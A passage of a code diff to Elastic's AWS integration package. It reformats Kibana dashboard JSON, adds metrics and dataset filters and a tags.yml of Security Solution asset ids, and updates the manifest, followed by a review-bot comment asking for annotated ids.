"aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "internalReferences": [], - "adHocDataViews": {} - } - }, - "enhancements": {}, - "hidePanelTitles": false + } + }, + "internalReferences": [], + "adHocDataViews": {} + } }, - "title": "5XX Error" - } + "enhancements": {}, + "hidePanelTitles": false + }, + "title": "5XX Error" + } ], "timeRestore": false, "title": "[Metrics AWS] API Gateway HTTP Overview", 
@@ -1996,62 +1996,62 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "7c57d40d-fc76-48d5-a436-55a498d56910:indexpattern-datasource-layer-14e551f8-dfa7-437b-ac75-0e196533af38", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "d5eaca19-1beb-4a9b-a357-883fa8890cdf:indexpattern-datasource-layer-14d15e2d-7223-4aae-90e7-0ad8c4ebc71a" - }, - { + }, + { "name": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae:indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "e71f676d-e0d3-40a3-9439-34de613469f4:indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" - }, - { + }, + { "name": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6:indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "name": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94:indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "1c8bb14c-861c-4681-923f-85ec02c508ee:indexpattern-datasource-layer-5e9706cb-90ee-4f08-af6a-f2a8048628af" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "1a3ffddd-99ee-4555-b092-94984db3de9e:indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" - }, - { + }, + { "name": "controlGroup_4c6977b0-40b7-4e35-9e86-cc87582fbf75:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "controlGroup_792f0941-104f-4b25-9f8f-bcd22ac55e5f:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "controlGroup_85812c5e-349a-4cdc-a443-3389f87bd41b:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - } + } ], "type": 
"dashboard" } \ No newline at end of file diff --git a/packages/aws/kibana/dashboard/aws-fac28650-7349-11e9-816b-07687310a99a.json b/packages/aws/kibana/dashboard/aws-fac28650-7349-11e9-816b-07687310a99a.json index 67bdff7ebf27..ff6905b94318 100644 --- a/packages/aws/kibana/dashboard/aws-fac28650-7349-11e9-816b-07687310a99a.json +++ b/packages/aws/kibana/dashboard/aws-fac28650-7349-11e9-816b-07687310a99a.json 
@@ -9,7 +9,189 @@ "description": "Overview of AWS Metrics", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": "Only metrics data", + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.type", + "negate": false, + "params": { + "query": "metrics" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.type": "metrics" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "aws.apigateway_metrics", + "aws.billing", + "aws.cloudwatch_metrics", + "aws.dynamodb", + "aws.ebs", + "aws.ec2_metrics", + "aws.ecs_metrics", + "aws.elb_metrics", + "aws.emr_metrics", + "aws.firewall_metrics", + "aws.kinesis", + "aws.lambda", + "aws.natgateway", + "aws.rds", + "aws.redshift", + "aws.s3_daily_storage", + "aws.s3_request", + "aws.s3_storage_lens", + "aws.sns", + "aws.sqs", + "aws.transitgateway", + "aws.usage", + "aws.vpn" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "aws.apigateway_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.billing" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.cloudwatch_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.dynamodb" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.ebs" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.ec2_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.ecs_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.elb_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.emr_metrics" + } + }, + { + 
"match_phrase": { + "data_stream.dataset": "aws.firewall_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.kinesis" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.lambda" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.natgateway" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.rds" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.redshift" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_daily_storage" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_request" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_storage_lens" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.sns" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.sqs" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.transitgateway" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.usage" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.vpn" + } + } + ] + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/tags.yml b/packages/aws/kibana/tags.yml new file mode 100644 index 000000000000..387b221009b5 --- /dev/null +++ b/packages/aws/kibana/tags.yml 
@@ -0,0 +1,21 @@ +- text: Security Solution + asset_ids: + - aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb + - aws-562bdea0-4ba7-11ec-8282-5342b8988acc + - aws-383d4630-63df-11ed-be08-4b4db5223139 + - aws-131a1550-5a0b-11ed-a807-bd2da8f2e79b + - aws-68ba7bd0-20b6-11ea-8f72-2f8d21e50b0c + - aws-2ba11b50-4b9d-11ec-8282-5342b8988acc + - aws-3d3dbe00-f79f-11ec-aa7f-c173c0f9e267 + - aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267 + - aws-9d21f520-6a36-11ed-b880-2f1b70138655 + - aws-401261a0-6a39-11ed-b880-2f1b70138655 + - aws-c9f103d0-5f63-11ed-bd69-473ce047ef30 + - aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4 + - aws-f890a5b0-6a3a-11ed-b880-2f1b70138655 + - aws-b111d3a0-5f3e-11ed-b2ee-f91fa284c4b5 + - aws-b3169d70-6a38-11ed-b880-2f1b70138655 + - aws-cc2e2cf0-5f3f-11ed-b2ee-f91fa284c4b5 + - aws-df758050-6a49-11ed-b880-2f1b70138655 + - aws-dffd2200-5a52-11ed-a807-bd2da8f2e79b + - aws-15503340-4488-11ea-ad63-791a5dc86f10 diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index 2d271e9501b1..0d9bde4057f7 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,15 +1,16 @@ -format_version: 1.0.0 +format_version: 3.0.0 name: aws title: AWS -version: 2.6.1 -license: basic +version: 2.7.0 description: Collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent. type: integration categories: - aws -release: ga conditions: - kibana.version: "^8.9.0" + elastic: + subscription: basic + kibana: + version: "^8.9.0" screenshots: - src: /img/metricbeat-aws-overview.png title: metricbeat aws overview @@ -803,3 +804,4 @@ policy_templates: type: image/svg+xml owner: github: elastic/obs-cloud-monitoring + type: elastic
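Review bot: The new `packages/aws/kibana/tags.yml` lists 19 opaque `asset_ids` with no indication of which dashboard or saved search each one is, so a reviewer cannot tell from the file whether the right assets are being surfaced in the Security Solution UI. I would add a header comment such as `# Assets tagged for the Security Solution UI; every id must match a saved object shipped under packages/aws/kibana/.` and a trailing `# <asset title>` comment on each id. It would also help to confirm that the package check rejects an id that does not resolve to a shipped asset, since a mistyped or stale entry would otherwise presumably go unnoticed.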